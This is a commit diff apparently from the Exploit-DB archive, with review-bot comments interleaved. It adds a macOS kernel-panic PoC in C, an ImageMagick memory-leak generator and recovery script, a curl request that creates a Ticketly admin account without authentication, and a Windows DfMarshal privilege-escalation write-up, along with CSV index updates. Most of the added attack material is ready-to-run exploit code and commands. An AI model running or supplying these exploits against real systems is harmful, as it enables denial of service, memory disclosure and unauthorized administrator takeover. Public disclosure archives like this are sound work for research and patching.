DB: 2018-11-21

4 changes to exploits/shellcodes

macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)

Qpopper 4.0.x - poppassd Privilege Escalation
Qpopper 4.0.x - 'poppassd' Privilege Escalation

HP-UX 11.0/11.11 - swxxx Privilege Escalation
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation

ABRT - raceabrt Privilege Escalation(Metasploit)
ABRT - 'raceabrt' Privilege Escalation (Metasploit)
ImageMagick - Memory Leak
Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
Offensive Security 2018-11-21 05:01:38 +00:00
parent dcc75fdf49
commit e3299ef341
5 changed files with 218 additions and 12 deletions

@ -0,0 +1,39 @@
# Exploit Title: MacOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
# Date: 2018-07-30
# Exploit Author: Fabiano Anemone
# Vendor Homepage: https://www.apple.com/
# Version: iOS 11.4.1 / MacOS 10.13.6
# Tested on: iOS / MacOS
# CVE: Not assigned
# Tweet: https://twitter.com/anoane/status/1048549170217451520
# iOS 11 / MacOS 10.13 - workq_kernreturn syscall local DoS
# workq_kernreturn_dos.c
# workq_kernreturn_dos
# Created by FABIANO ANEMONE (@ on 7/30/18.
# Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
# Reported to product-security@apple.com on 7/30/18
# Fixed in Mojave.
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/errno.h>
#define WQOPS_THREAD_WORKLOOP_RETURN 0x100 /* parks the thread after delivering the passed kevent array */
int workq_kernreturn(int options, user_addr_t item, int affinity, int prio) {
return syscall(SYS_workq_kernreturn, options, item, affinity, prio);
}
int main(int argc, const char * argv[]) {
//short version that fits one tweet:
//syscall(368,256,1,1);
errno = 0;
user_addr_t any_non_zero_address = 1;
int res = workq_kernreturn(WQOPS_THREAD_WORKLOOP_RETURN, any_non_zero_address, 1, 0);
// MacOS 10.13.X and iOS 11.X will panic at this point
printf("workq_kernreturn: %d - res: %d - errno: %d\n", 0, res, errno);
return 0;
}
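
Review bot: the metadata header at the top of this new .c file is written as lines beginning with "# " (from "# Exploit Title:" down to "# Fixed in Mojave."), which are not C comments, so as shown the file cannot be compiled or linted without hand editing; wrap the header in a /* ... */ block. In the same header, "Created by FABIANO ANEMONE (@ on 7/30/18." has lost the handle after "(@" and should be restored or trimmed. In main(), the printf passes a literal 0 for the first %d, so the "workq_kernreturn: %d" field carries no information; either drop that field or print the option value that was actually passed.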

@ -0,0 +1,32 @@
#!/bin/bash
help() {
echo "Usage poc generator: `basename $0` gen WIDTHxHEIGHT NAME.xbm [minimal]"
echo " Example gen: `basename $0` gen 512x512 poc.xbm"
echo "Usage result recovery: `basename $0` recover SAVED_PREVIEW.png|jpeg|gif|etc"
echo " Example recovery: `basename $0` recover avatar.png"
}
if [ "$1" == "-h" ]; then
help;
exit 0
fi
if [ "$1" == "gen" ]; then
echo "Generating..."
convert -size $2 xc:white $3
sed -i '0,/0x../s//0x80000001/' $3
if [ "$4" == "minimal" ]; then
echo "Shrink to minimal body size mode"
sed -i 's/0x00//g' $3
sed -i 's/,//g' $3
sed -i '/^\s*$/d' $3
fi
echo "Done"
exit 0
fi
if [ "$1" == "recover" ]; then
convert $2 temp.xbm
cat temp.xbm | grep -o '0x..' | xxd -r -p | strings -3
rm temp.xbm
exit 0
fi
help;
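
Review bot: this new script starts straight at the shebang with no metadata header, unlike the other files added in this commit, so nothing here states the affected ImageMagick versions, the advisory or the fixed release; add the usual title, author, version and reference lines so a reader can tell which builds need patching. In the recover branch, "convert $2 temp.xbm" followed by "rm temp.xbm" overwrites and then deletes any existing temp.xbm in the working directory; use a mktemp file instead. The positional parameters ($2, $3) are also used unquoted in the convert and sed calls and there is no argument-count check before the gen and recover branches, so a missing or space-containing argument produces a confusing failure rather than the help text.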

@ -0,0 +1,27 @@
# Exploit Title: Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# 4. References:
# https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/
# 1. Technical Description:
# Ticketly version 1.0 are affected by a privilege escalation vulnerability,
# an attacker could create an administrator user account by sending a POST
# request to the resource /action/add_user.php without authentication.
# 2. Proof Of Concept (PoC):
# Send request curl:
curl -i -s -k -X $'POST' \
-H $'Host: [HOST]' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 82' \
--data-binary $'name=[NAME]&lastname=[LASTNAME]&email=[EMAIL]&status=1&password=[PASS]' \
$'http://[PATH]/action/add_user.php'
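
Review bot: the header says "# CVE: N/A" while the reference URL two lines below carries cve-2018-18922 in its path; if that identifier applies, put it in the CVE field so the entry can be matched against scanners and advisories. The title classifies the issue as Cross-Site Request Forgery, but the technical description describes a POST to /action/add_user.php "without authentication", which is a missing-authentication flaw; the title and description should agree, because the fix differs (an access check on the endpoint rather than an anti-CSRF token). The section numbers also run 4, 1, 2 with no section 3, and "version 1.0 are affected" should read "is affected".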

@ -0,0 +1,104 @@
Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master)
Platform: Windows 10 1803 (not tested earlier, although code looks similar on Win8+)
Class: Elevation of Privilege
Note, this is the master issue report for the DfMarshal unmarshaler. Im reporting multiple, non-exhaustive, issues in this marshaler in case you decide that you want to try and “fix” it rather than blocking the marshaler outright.
Summary: The unmarshaler for Storage objects is complete unsafe and yet is marked as a system trusted marshaler. There are multiple ways of abusing this to unmarshaler to get privilege escalation.
Description:
Storage objects are used by different parts of the OS and Office as a structured container format for sub-streams of data. You can create a new instance using APIs such as StgCreateDocFile. Being a COM object it can be marshaled around between processes, including special support during COM activation through CoGetInstanceFromIStorage. While all the important interfaces have proxy support the object also supports custom marshaling to improve performance when marshaling either INPROC or a LOCAL context.
The COM class DfMarshal CLSID:0000030b-0000-0000-c000-000000000046 (in coml2.dll on Windows 10, ole32.dll downlevel) implements the custom unmarshaling for storage objects. When marshaling the implementation generates the following output:
MSHFLAGS <4 bytes>
Object Type IID <16 bytes> - Either IID_IStream or IID_IStorage.
Standard Marshaled Interface <Variable> - Used if the custom marshal fails.
SDfMarshalPacket <0x70 bytes on 64 bit, 0x44 on 32 bit> - Data for the custom marshal.
The SDfMarshalPacket has the following structure, note this comes from the Windows 8.1 private symbols for OLE32.DLL which are available on the public symbol server. On Windows 10 when the code was moved to COML2.DLL the private symbols didnt move with it, however the code only seems to have had minor changes between 8.1 and 10.
struct SDfMarshalPacket
{
CBasedPubDocFilePtr pdf;
CBasedPubStreamPtr pst;
CBasedSeekPointerPtr psp;
CBasedMarshalListPtr pml;
CBasedDFBasisPtr pdfb;
CBasedGlobalContextPtr pgc;
CBasedGlobalFileStreamPtr fsBase;
CBasedGlobalFileStreamPtr fsDirty;
CBasedGlobalFileStreamPtr fsOriginal;
unsigned int ulHeapName;
unsigned int cntxid;
GUID cntxkey;
CPerContext *ppc;
HANDLE hMem;
};
The Ptr structures are native pointer sized values which are used as relative offsets into a shared memory section. The cntxid is the PID of the marshaling process, the hMem a handle to a section object which contains the shared allocation pool for use between processes. When the custom unmarshaling process starts the receiving process will try and open the process containing the shared memory handle (using cntxid and hMem) and duplicate it into the current process. Then it will map the section into memory and rebuild a local storage object based on the various relative pointers stored in the marshaled structure. Note that there is provision for performance improvements for in-process marshaling where cntxkey is a random GUID value which is known only to the process (its not set for cross context marshal). In that case ppc is used as a valid pointer, but ppc is always set so this leaks memory layout information to the process the object is marshaled to (not reporting this one separately).
This will only work if the process can open the marshalling process for PROCESS_DUP_HANDLE access. This restricts this to processes at the same or higher privilege, therefore an obvious target would be unmarshaling this data from a user into a system service. Fortunately theres some protection against that, the unmarshal occurs in CSharedMemoryBlock::InitUnMarshal and looks something like the following:
int CSharedMemoryBlock::InitUnMarshal(void *hMem,
unsigned int dwProcessId,
unsigned int culCommitSize) {
unsigned int dwCurrentSession;
unsigned int dwSourceSession;
ProcessIdToSessionId(dwProcessId, &dwSourceSession);
ProcessIdToSessionId(GetCurrentProcessId(), &dwCurrentSession);
if (dwSourceSession != dwCurrentSession)
return E_ACCESSDENIED;
HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, 0, dwProcessId);
...
}
The code contains a check that the process containing the shared section is in the same console session as the process doing the unmarshal. If theyre not in the same session then the unmarshal process will fail. Its unclear if this is a security check or whether its a reliability check, and even if its a security check its not hard to find a way around this.
One thought would be to try and use this to escape a sandbox, such as AppContainer as the sandbox process and a likely COM target would all be in the same session. While there are checks for the current process being in an AppContainer (so an AC process will never use the custom unmarshaling) there are no checks for the caller being an in AC. In fact there would be as the default HYBRID custom marshaling policy should kick in and block the custom unmarshal. However as DfMarshal is marked as a system trusted marshaler, it will still execute. It turns out that its difficult to trivially use this from a sandbox as later in the initialization an event object is opened by name (in CDfMutex::Init) from the current sessions BaseNamedObjects directory which an AC cant write to. However if some other process in the same session had already shared a storage object, creating the event _and_ the AC could read the randomly assigned name it could be hijacked.
So were back to either abusing something like UAC elevated processes/runas on the same desktop (doable but not a security boundary) or try and bypass the check to unmarshal from a user process into a system process. The key is the knowledge that the unmarshaler will open any process we tell it to, including other services in Session 0. The code could try and query the PID of the caller through COM (and thereby through MSRPC/ALPC) but it doesnt. This means as long as we can get a writable section shared between our process and a process in session 0 we can tell the unmarshaler to look there for the section handle.
After some investigation I discovered that the Audio Service will create a writable section handle for you (actually via AUDIODG) and share it back to you when you create a rendering buffer (I didnt investigation any further). This section is large enough to copy our existing shared memory from the marshal process. We can therefore create the section, copy over the existing shared memory (or fake one from scratch) then provide the PID and handle to the system service for use in unmarshaling. We dont have to guess the handle as the handle table from NtQuerySystemInformation reports object addresses so you just match the current processs handle and the AUDIODG handles. When the system service unmarshals this it will now pass the session check, we also have to create a duplicate event object in the global BNO but a normal user has access to that.
During the unmarshal process the implementation interacts with the shared memory as an allocation region, this is where all the issues occur. In theory if you could find a system process which actually interacts with the storage object you might find some more interesting behaviors (such as getting the system service to write to arbitrary files) but everything Ill describe in other issues all occur during the unmarshal process and so can be used to target any system COM service using CoGetInstanceFromStorage. Basically the storage object code uses the shared memory section as if everything is running at the same level of trust and doesnt take any real precautions against a malicious actor which has access to the same shared section or controls the existing data.
As mentioned Im reporting 4 other issues/bug classes at the same time. This is the master issue, and potentially you can mark the others as duplicates depending on how you want to fix them. Though Id remind you that when you marked a bug as duplicate last time it didnt get fixed so perhaps exercise caution. The four issues Im reporting at the same time are:
- DfMarshal Missing Bounds Checking Elevation of Privilege
- DfMarshal Shared Allocator Elevation of Privilege
- DfMarshal Arbitrary File Delete Elevation of Privilege
- DfMarshal Handle Duplication TOCTOU Elevation of Privilege
Possible fixing ideas:
DO NOT just remove the class from the trusted marshalers list. Some COM services such as SearchIndexer runs without the EOAC_NO_CUSTOM_MARSHAL flag set.
You could query the PID of the caller in the unmarshal process and only duplicate from that process, or processes in the same session as the caller. However bear in mind that when unmarshaling during activation (through CoGetInstanceFromStorage) the caller will actually be RPCSS so this might be bypassable. Depending on how you did it this might mean that a session hopping bug (which Ive found before) would allow you to elevate privilege.
You could just rewrite the whole thing, its an incredibly bad piece of code.
You could just restrict it to a very limited set of scenarios, but again you risk bypasses due to mistakes in the checks.
Proof of Concept:
See the separate reports for PoCs for various issues I identified. The source for all PoCs is attached to this issue.
After looking again at the implementation of the unmarshaler there is a check in DfUnmarshalInterface for the caller being in an AC using the IMarshalingStream::GetMarshalingContextAttribute method which ultimately tries to impersonate the caller and check if the impersonation token is an AC or not.
Quick update on RS5, as this was also discovered internal to Microsoft (I believe). There has been changes to the unmarshaler in three ways:
1) A check is now performed on the owner of the section from its security descriptor which must now match the current process' user.
2) All classes now have a GUID associated with them which is verified before trusting the data from the shared section.
3) Addition of bounds checking on structure data size.
1 isn't that hard to bypass, although the PoC provided won't as it gets a section from the Audio Service which is running as LOCAL SERVICE. 2 and 3only matters for the cases where we we're trying to read out of bounds such as issue 1645 . Microsoft will apparently be fixing RS5 as well and won't be backporting this changes verbatim to prior versions as it wouldn't be possible in some cases (such as 1 not working on Windows 7). This does look in many ways like a non-backported fix, even if it doesn't really fix much. Due to the opaqueness of MSRC it's hard to confirm or deny that they weren't going to fix down level at some point.
Fixed in https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8550.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45893.zip
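
Review bot: the activation API is spelled CoGetInstanceFromIStorage in the description paragraph but CoGetInstanceFromStorage in the paragraph on unmarshal-time issues and again under "Possible fixing ideas"; use one spelling so readers searching for the affected entry point find every mention. The two follow-up paragraphs ("After looking again at the implementation ..." and "Quick update on RS5 ...") are appended after the first "Proof of Concept:" section with no separator or date, and the first of them revises the earlier statement that "there are no checks for the caller being an in AC", so label them as later updates; the second "Proof of Concept:" heading could then be merged with the first. The original report body has also lost its apostrophes ("Im reporting", "didnt move", "theres some protection") while the later update keeps them, which points to an encoding problem at import. The CVE number appears only inside the "Fixed in" URL; a header line naming CVE-2018-8550 would make the entry searchable.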

@ -6194,11 +6194,12 @@ id,file,description,date,author,type,platform,port
45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
15,exploits/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation",2003-04-18,"Neeko Oni",local,osx,
21,exploits/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,local,linux,
21,exploits/linux/local/21.c,"Qpopper 4.0.x - 'poppassd' Privilege Escalation",2003-04-29,Xpl017Elz,local,linux,
29,exploits/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation",2003-05-12,bob,local,bsd,
31,exploits/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation",2003-05-14,anonymous,local,linux,
32,exploits/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow",2003-05-21,einstein,local,windows,
@ -6325,7 +6326,7 @@ id,file,description,date,author,type,platform,port
470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux,
476,exploits/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow",2004-09-23,CoKi,local,linux,
479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String",2004-09-25,n4rk0tix,local,linux,
482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,local,hp-ux,
482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation",2002-12-11,watercloud,local,hp-ux,
558,exploits/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,local,windows,
559,exploits/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,local,windows,
560,exploits/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,local,windows,
@ -9675,7 +9676,7 @@ id,file,description,date,author,type,platform,port
44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
44066,exploits/windows/local/44066.md,"Dashlane - DLL Hijacking",2017-08-03,SecuriTeam,local,windows,
44097,exploits/linux/local/44097.rb,"ABRT - raceabrt Privilege Escalation(Metasploit)",2018-02-16,Metasploit,local,linux,
44097,exploits/linux/local/44097.rb,"ABRT - 'raceabrt' Privilege Escalation (Metasploit)",2018-02-16,Metasploit,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -10113,6 +10114,8 @@ id,file,description,date,author,type,platform,port
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
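
Review bot: the new row 45890 is described only as "ImageMagick - Memory Leak", with no product version, while neighbouring rows such as 45888 ("HTML Video Player 1.2.5 - Buffer-Overflow (SEH)") carry one; since 45890.sh has no header either, nothing in this commit records which ImageMagick releases are affected. Add the version range to the description. Row 45893 could likewise reference the CVE-2018-8550 advisory that the report text links to, so the index entry can be correlated with the vendor fix.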
@ -38619,7 +38622,7 @@ id,file,description,date,author,type,platform,port
41551,exploits/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
41552,exploits/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
41553,exploits/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80
41556,exploits/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
@ -40384,11 +40387,12 @@ id,file,description,date,author,type,platform,port
45864,exploits/php/webapps/45864.txt,"Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45868,exploits/php/webapps/45868.txt,"EverSync 0.5 - Arbitrary File Download",2018-11-15,"Ihsan Sencan",webapps,php,80
45875,exploits/php/webapps/45875.txt,"Meneame English Pligg 5.8 - 'search' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,
45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,
45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,
45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80
45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,80
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
